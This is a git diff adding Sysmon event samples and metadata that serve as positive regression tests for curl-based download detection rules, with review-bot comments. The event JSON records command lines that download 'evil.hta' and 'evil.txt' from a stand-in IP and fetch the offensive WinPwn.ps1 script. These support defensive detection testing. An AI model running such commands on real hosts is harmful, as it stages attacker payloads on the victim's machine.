+ "UtcTime": "2025-12-11 07:02:39.718",
+ "ProcessGuid": "0197231E-6C8F-693A-2613-000000000800",
+ "ProcessId": 17752,
+ "Image": "C:\\Windows\\System32\\curl.exe",
+ "FileVersion": "8.10.1",
+ "Description": "The curl executable",
+ "Product": "The curl executable",
+ "Company": "curl, https://curl.se/",
+ "OriginalFileName": "curl.exe",
+ "CommandLine": "curl --output hello.txt https://12.34.56.78/hack/evil.txt",
+ "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\",
+ "User": "swachchhanda\\xodih",
+ "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000",
+ "LogonId": "0x317fb",
+ "TerminalSessionId": 1,
+ "IntegrityLevel": "Medium",
+ "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
+ "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800",
+ "ParentProcessId": 14736,
+ "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+ "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
+ "ParentUser": "swachchhanda\\xodih"
+ }
+ }
+}
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/info.yml
new file mode 100644
index 000000000..73c9feaf9
--- /dev/null
+++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/info.yml
@@ -0,0 +1,13 @@
+id: 6aac357c-fe1d-4ca0-82e2-df626f71e838
+description: N/A
+date: 2025-12-11
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+rule_metadata:
+ - id: 9cc85849-3b02-4cb5-b371-3a1ff54f2218
+ title: File Download From IP URL Via Curl.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.evtx
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.evtx b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.evtx new file mode 100755 index 0000000000000000000000000000000000000000..09038101d2bf9daa9e3a11d0e9b02df54f642b28 GIT binary patch literal 69632 zcmeI0TWnlc6^7S2o*9qFo*BEXDVHX7(o#r>9p7(hK;yB8nA)w|rUWEQm9fY1B=(F| z+fC9)C;}>IAD}!S9*V@}1zJ$wDxs=UrAmmmBB3HKLKTP?5E4>A5ugZ}|KI0qkL}ut zOCR~q=*-!dwbx$zTWhaYKm*Cm#;_@_POVIh+E!HsfZ08gnf`>M8UN;x74MeCS&Vdl<&9pwlduvmo`kI3A9* zC+yR<;YOk>Z~2BogH1#1nONe+T;n!alQxdNkKs-+&G%3-Eg7aLOKm1L+nb;&cHuCGCDx{LZ=Xi?lt2?kn(H z4ICH1ouWx=PXPN2D&LGXp89$-CapN8MTnMR09~{I8Hb0vh%xox)yxhL`a!^xvbKgG zgJ`Mel2Su<8|}xSkS5cTh|RKud_G>BO4$=oNbT{uTI|k-M6S(_BWgtdH&Rs!DpWP`G1~x`L1{1FiOFPzeJIzF0b(~F~EHC9(QWz(9XO# zf+tU5#@X|=1acK8W$%Y@r;xQko>wot~Sg|M+jNVSL^F{TBYVneAu((y65DgeqTAEVp?ohG z#~7BmDyCrC+Z>Ii&lzXjt+Bm{tt}sBTOz4Fy*&k8=iSb#M+edhhCVN0`k; zN0E>8Pt+}FLyU5t@pU93#yrL38tuAhd_Ib-zIX+kGhRUsk;QeFVV}=z^|Lq3GM~cA z`{I%9^^qwgB)$sqrDzQ{wndVA+BgGAPdJJke+1Nd+!65@h-Y%gX|%)g*kSvPkJfi* zw7z|IXMODUU3Aw0?cFb?+N1IG1*76nolItjz5Y-Lvmd~SgfY#8NabB|T4%~1Mj7#A z55)Hg*B96`c#h+~-__wo92b~UmC9t*4wqCOhSb-LHiUK>D8??IX0J=TF&&_T%b z;dOKr^%2ZJf_eMw@O|G7{#qWbT<1XnT}#7;<8stycbyQkJ6>q|pm`R%gy-Qhbd}xd zKa5fjX5u$b@iON1G99rD>rBsIaCz!rQeMXi=<~1TYp{_o=Dx2BQCQwlk8JY&9T?k* zPtDCAy$W=|3hsMmoGPrQ?m5UEeb+1`+2!bUf$Sj4L++KH?+o*HF@BwA?)6%Z#uUB( z*TCyCW?#T;ODGqR5m&bkt65~L8ZTvmI zfbulf#~C+}A*M0gfStzo7(Tstb|VJ5@#GH`Mgv>NP#S?;2^KPDhEN*E;ahUiGJ@v` zM8X;LGR6j>Z`jEXI6Vc#*8pz*>?xo$0t&qt-3L8GD3wquqBMx!34Hk74-I^dqnFXs z4I4P37wtt???c}ZWcr=Vfb#<_?T7vz*fWW>%{ZHA*=daIaWeh*9)lGF&{DvhgKiCc z_F#rFv=%WZXN;cxPNK){iPam!mFHW@Gi@&*s~vn#tbn-R5k3me!N!MS{Ug{_k2}BC zf8P1Mv~%1+JWuOz@prN=5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p 
z5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo z0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p z5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo z0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z5fA|p5CIVo0TB=Z M5fA|p_!f>Hq)$ literal 0 HcmV?d00001 diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.json new file mode 100644 index 000000000..e4493b612 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.json 
@@ -0,0 +1,66 @@
+{
+ "Event": {
+ "#attributes": {
+ "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+ },
+ "System": {
+ "Provider": {
+ "#attributes": {
+ "Name": "Microsoft-Windows-Sysmon",
+ "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+ }
+ },
+ "EventID": 1,
+ "Version": 5,
+ "Level": 4,
+ "Task": 1,
+ "Opcode": 0,
+ "Keywords": "0x8000000000000000",
+ "TimeCreated": {
+ "#attributes": {
+ "SystemTime": "2025-12-11T06:34:20.042883Z"
+ }
+ },
+ "EventRecordID": 21588,
+ "Correlation": null,
+ "Execution": {
+ "#attributes": {
+ "ProcessID": 3208,
+ "ThreadID": 1724
+ }
+ },
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "Computer": "swachchhanda",
+ "Security": {
+ "#attributes": {
+ "UserID": "S-1-5-18"
+ }
+ }
+ },
+ "EventData": {
+ "RuleName": "-",
+ "UtcTime": "2025-12-11 06:34:19.983",
+ "ProcessGuid": "0197231E-65EB-693A-F112-000000000800",
+ "ProcessId": 14440,
+ "Image": "C:\\Windows\\System32\\curl.exe",
+ "FileVersion": "8.10.1",
+ "Description": "The curl executable",
+ "Product": "The curl executable",
+ "Company": "curl, https://curl.se/",
+ "OriginalFileName": "curl.exe",
+ "CommandLine": "curl --output benign.hta \"https://12.34.56.78/hack/evil.hta\"",
+ "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\",
+ "User": "swachchhanda\\xodih",
+ "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000",
+ "LogonId": "0x317fb",
+ "TerminalSessionId": 1,
+ "IntegrityLevel": "Medium",
+ "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
+ "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800",
+ "ParentProcessId": 14736,
+ "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+ "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
+ "ParentUser": "swachchhanda\\xodih"
+ }
+ }
+}
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/info.yml
new file mode 100644
index 000000000..2b8c8c48d
--- /dev/null
+++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/info.yml
@@ -0,0 +1,13 @@
+id: 0f1b33fc-f97e-4469-a9ec-32ffb436f490
+description: N/A
+date: 2025-12-11
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+rule_metadata:
+ - id: 5cb299fc-5fb1-4d07-b989-0644c68b6043
+ title: Suspicious File Download From IP Via Curl.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.evtx
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.evtx b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.evtx new file mode 100755 index 0000000000000000000000000000000000000000..bd24a3fd76ab500f06bbea9b078f319312d873cc GIT binary patch literal 69632 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 VfCz|y2#A0Ph=2%)!2bb({{U|hbjbh! literal 0 HcmV?d00001 diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.json new file mode 100644 index 000000000..febe17014 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.json 
@@ -0,0 +1,66 @@
+{
+ "Event": {
+ "#attributes": {
+ "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+ },
+ "System": {
+ "Provider": {
+ "#attributes": {
+ "Name": "Microsoft-Windows-Sysmon",
+ "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+ }
+ },
+ "EventID": 1,
+ "Version": 5,
+ "Level": 4,
+ "Task": 1,
+ "Opcode": 0,
+ "Keywords": "0x8000000000000000",
+ "TimeCreated": {
+ "#attributes": {
+ "SystemTime": "2025-12-11T06:41:38.130858Z"
+ }
+ },
+ "EventRecordID": 21642,
+ "Correlation": null,
+ "Execution": {
+ "#attributes": {
+ "ProcessID": 3208,
+ "ThreadID": 1724
+ }
+ },
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "Computer": "swachchhanda",
+ "Security": {
+ "#attributes": {
+ "UserID": "S-1-5-18"
+ }
+ }
+ },
+ "EventData": {
+ "RuleName": "-",
+ "UtcTime": "2025-12-11 06:41:38.096",
+ "ProcessGuid": "0197231E-67A2-693A-FF12-000000000800",
+ "ProcessId": 9656,
+ "Image": "C:\\Windows\\System32\\curl.exe",
+ "FileVersion": "8.10.1",
+ "Description": "The curl executable",
+ "Product": "The curl executable",
+ "Company": "curl, https://curl.se/",
+ "OriginalFileName": "curl.exe",
+ "CommandLine": "curl -O \"https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1\"",
+ "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\",
+ "User": "swachchhanda\\xodih",
+ "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000",
+ "LogonId": "0x317fb",
+ "TerminalSessionId": 1,
+ "IntegrityLevel": "Medium",
+ "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
+ "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800",
+ "ParentProcessId": 14736,
+ "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+ "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
+ "ParentUser": "swachchhanda\\xodih"
+ }
+ }
+}
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/info.yml
new file mode 100644
index 000000000..56af37248
--- /dev/null
+++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/info.yml
@@ -0,0 +1,13 @@
+id: 68e8f5c3-5a3b-4878-82d3-24d961eb219b
+description: N/A
+date: 2025-12-11
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+rule_metadata:
+ - id: 56454143-524f-49fb-b1c6-3fb8b1ad41fb
+ title: Suspicious File Download From File Sharing Domain Via Curl.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.evtx
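Review bot: `description: N/A` leaves the test metadata without any statement of what the sample exercises, so a future reader has to open the evtx/json pair to learn that this is a single positive `curl -O` download from a file-sharing domain. A one-line description such as `description: Positive sample - curl.exe downloading a script from a file-sharing domain via -O` would make the intent and the expected `match_count: 1` self-explanatory. The same placeholder is used in the info.yml hunks at L27, L31 and L35.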
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.evtx b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.evtx new file mode 100755 index 0000000000000000000000000000000000000000..7ec40b98863be39f47a0da515a406fe04c7a3653 GIT binary patch literal 69632 zcmeI0O>A6O701teGxIziduHsmra+sJq)b%`fb$cpm}I z^YX*@J-JovKxCH7n*B3l_Sf{*9lBVI2kA z^nXX&;Bw>2AA({KSZDCo>A(NL&&2Xa{`S(NNB;ENH`ib3e))N2kpiu%`aM^}>0*NYjuYKyjj&J}cIf|AWcY}J#?(XCbK5-V2LVrH-Kijl zXldn=S}MPV_M=cplW9pzJ}l%cM_Zo3AfFJv|Bnu;4JZ2ry*CXB|AL#cFxMs zxC+A=Evr~*thdl+#fV9PZZG|!+cH&N`~ zv$O-=G}@B;O?wivmms);Phv&ZvJq1&UHi;f7KG;$wjMyC-Lk2m%Y_q@F|V&8L@SV- zK_E4q-E>-)1?ga8;~@wztI=_%n^^~H5urfi;=K}Pf=-z5G{$pd^Nw}RqJ^x-p~5HO z@AYNjPP%0cmcE~Xw!0vT&~rB;6$e(limdfm z*1FM)5J!o3)^bh`!(DqnYF$>evv?k8KkT&l)6mv^Ui?O<+3QgHoeORdGFU8=;nY*G zd3&`QLPvin8Gmm}x(%*e1u?&E!#pga zY;Pj#Tpw%h*b&q|v4;83iX3w^8FODt|Nm};Sqt+i%ToSuB2Vup)@Kk>Ja{g{{xFX) z+S8UAXmgd@6K$B!++s`>@;u%c*~^>$3iHt|_{4|LESNH}g!#5x$TCZD^KqwMgKRdI zJ(;YNe3Er`A#P~JW!z23FPLACKgq&;`z=-y&qPv;>`AAE#IT`AY}XkpZcj6Z^1Yyn zF)VXcOu@9bBOXnkGtRhM6MNH}TRzNp#!|a_dlI@XyPegF4x~}qv}^RWq5zyjsSInc7%;b*Kc!w3S!}b~bizXv1I#xxTmmG>oSohg45WyFs? znB2!*Ux4Tj5Rn01SK=dp#|7mndkk5U#{%mksGmyYdfjX1pp}r*2TN+4PPRVtU&P%@9UTW0&weT!5~+JN-vd z8gRM?+$mniyk6!|BEve<^A}y7;#t4Hl-F?_`uuD83T)(yx$o;k6xO%ZW1D>cA&l+C zhx>$*aXaVs8e@GN#kb~VXP z+NLq)r5Z{Vlt$1yfe*ijp@GjTdKn4*uz@26(Oz-&A@rSu%&?Owp>G(yt=ZISap97d-9IX}1$rY zKmYKmYKmYKmYKmYKmYKmYKmYKmYKmYKmYKmYKmY zKmYKmYKmYKmYKmYKmYKmYKmYKmYKmYKmYKmYKmY mKmYKmYKmch{dRAiq literal 0 HcmV?d00001 diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.json new file mode 100644 index 000000000..9b6dad729 --- /dev/null 
+++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.json
@@ -0,0 +1,66 @@
+{
+ "Event": {
+ "#attributes": {
+ "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+ },
+ "System": {
+ "Provider": {
+ "#attributes": {
+ "Name": "Microsoft-Windows-Sysmon",
+ "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+ }
+ },
+ "EventID": 1,
+ "Version": 5,
+ "Level": 4,
+ "Task": 1,
+ "Opcode": 0,
+ "Keywords": "0x8000000000000000",
+ "TimeCreated": {
+ "#attributes": {
+ "SystemTime": "2025-12-11T06:43:20.070938Z"
+ }
+ },
+ "EventRecordID": 21651,
+ "Correlation": null,
+ "Execution": {
+ "#attributes": {
+ "ProcessID": 3208,
+ "ThreadID": 1724
+ }
+ },
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "Computer": "swachchhanda",
+ "Security": {
+ "#attributes": {
+ "UserID": "S-1-5-18"
+ }
+ }
+ },
+ "EventData": {
+ "RuleName": "-",
+ "UtcTime": "2025-12-11 06:43:20.052",
+ "ProcessGuid": "0197231E-6808-693A-0413-000000000800",
+ "ProcessId": 17792,
+ "Image": "C:\\Windows\\System32\\curl.exe",
+ "FileVersion": "8.10.1",
+ "Description": "The curl executable",
+ "Product": "The curl executable",
+ "Company": "curl, https://curl.se/",
+ "OriginalFileName": "curl.exe",
+ "CommandLine": "curl --insecure http://example.com",
+ "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\",
+ "User": "swachchhanda\\xodih",
+ "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000",
+ "LogonId": "0x317fb",
+ "TerminalSessionId": 1,
+ "IntegrityLevel": "Medium",
+ "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
+ "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800",
+ "ParentProcessId": 14736,
+ "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+ "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
+ "ParentUser": "swachchhanda\\xodih"
+ }
+ }
+}
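Review bot: The sample command line `curl --insecure http://example.com` pairs the certificate-verification bypass with a plain-http URL, where `--insecure` has no effect, so the event does not reflect the risk the rule's title ("Insecure Transfer") describes. The rule presumably keys on the flag alone, so the sample still matches, but a recording against an `https://` URL would make the regression data a faithful example of the misuse rather than an inert flag. If the flag-only semantics are intentional, a short note in the matching info.yml would save the next reviewer the same question.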
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/info.yml
new file mode 100644
index 000000000..1fbe99a15
--- /dev/null
+++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/info.yml
@@ -0,0 +1,13 @@
+id: ef93f624-2b41-41ee-9596-298d3158acfb
+description: N/A
+date: 2025-12-11
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+rule_metadata:
+ - id: cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec
+ title: Insecure Transfer Via Curl.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.evtx
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.evtx b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.evtx new file mode 100755 index 0000000000000000000000000000000000000000..90ebbbd66af84dbb89394ab66812905c393b6c7a GIT binary patch literal 69632 zcmeI0TWnlc6^7S2bMbiWnX%iNa%n=6mO?`8_%gnx0ogMi5^9%FQbHw5m5Imkq_)Sz zb}mFh7PNx)p_B*2Lmxm;sTZoM5(1&B5)u;P1%iYsaS^IOyub@mK@p$`ng8GCY>#d1 z#8sb={xdpr_GRt0*Z$VpYoD3%`PoWszG~aAFm71GGqi+RTd-Z^UDrqdee+}QT8R{h zfCz|y2#A0Ph=2%)fCz|y2#A0P+?K%j{A_7%@p1FN?st2xQ4{_YSZg|x~<~d z2ymY3KYDF$v)I10SvF(#kCfS8lAC+XdeMFYe?z>}>-ufRJcT)V?ZceB{u#@^61TJM zIke4gv*+We|118J`QTZ60#NOe0`f9%Ix*}^Cs%|`#)&*I(QekBS+xV zf^GQ!`H6>qS-bFupb!Ms8oYJdN z^?GZ{#_f_-ZP8Xx|0?eEg}C#LLdve#g3Y6I86Byh-{v5;VoNq+$M9LUb7-kTW*X%# zJZosVXm!-;HVerv)az(JW|z^oh-a^L<5NVb+lKI6-I#uPODzo6*WZM%yx;0)()Jm< z3e78SMg;ii`ud}=%X{?gYZ*K3X1|2FW*~JDy#u%_J{TYTX3`#lu?y%l%jYdfe=d%P z!yQTcgsr-f=qgwtF`BSRh5zQvMB?797@_z<7Dp0WuD(pU3N$S4%r zJ*eCh$LaXBq@8iTc-)DEoG`EhsBjDLdUb!=J_QHTEkwlW0%}UxeW>`IbKzGRdl21M z;kPVa$7EgtlPfG2J3 zi6Dz;Y2=bhBDab5!%#?*X-Pyr%x5i2Tb{%qpAf$L_ZBNTG1@WjEb&;UAXllxJ3RY# z)<&Um1%@+PRjC7OEt3e^TsScq^ZE)x zv;@g%1k$3jn@(%9AQ`N$KL7z{H9GG2V#a}5Kq%0-Xs?8+pcN)u#&~XQ-jS{uw2<`} zRQM$PovsYrNw=)RvIwEs2O*L6`FM6BZI3`9wa4pfwL25Ze7hY?+8q!@=(!t_iUTWJ zMaDWTV>r5SB~jv?v8G)%A-w_4( zM--LJ6jAd2(y5gpe`K)Sa_;zJ!6%>k`F|dH`L4I%FiOFPzebU#F0b;J8DKtnmz~;a zv@LWB=_a^x1;qTe z4Rf%FvYoN4bA6<_Wm{1D#2V&8D{#!=c+3YH`u}$$%vhL9ScdWkV|jW%wmyZB;=yws z_J=uy(XO^sK%1-FnrOpZ>K0?lkmvEn$X?p;SC~uRf=_h#%z!BqOPFiAg)FlaHy?NE zRmf%{*}-_7(NmHQ!<-(M%-8$ewUoNDLc_#CDvqDYb3R!wx61F;6kMM!PN=Ux*^BFJ1xXj8~9HWO3b9*yl4_VW?6BR& zN9(&YTHh|avoUt_F1l-v_U;x_9npCDf>E)rK_kI4`c$RVB=j!kxjtk0D_6V{hj|J8TP#=lqI^An$uk|CR_n^%09y@?n z&;iI4(LREE0Q2`+pAFmod%qPtKQ~fqa;Htko`45RkeS+cLQHLWq3OfuDeMxShx5=? 
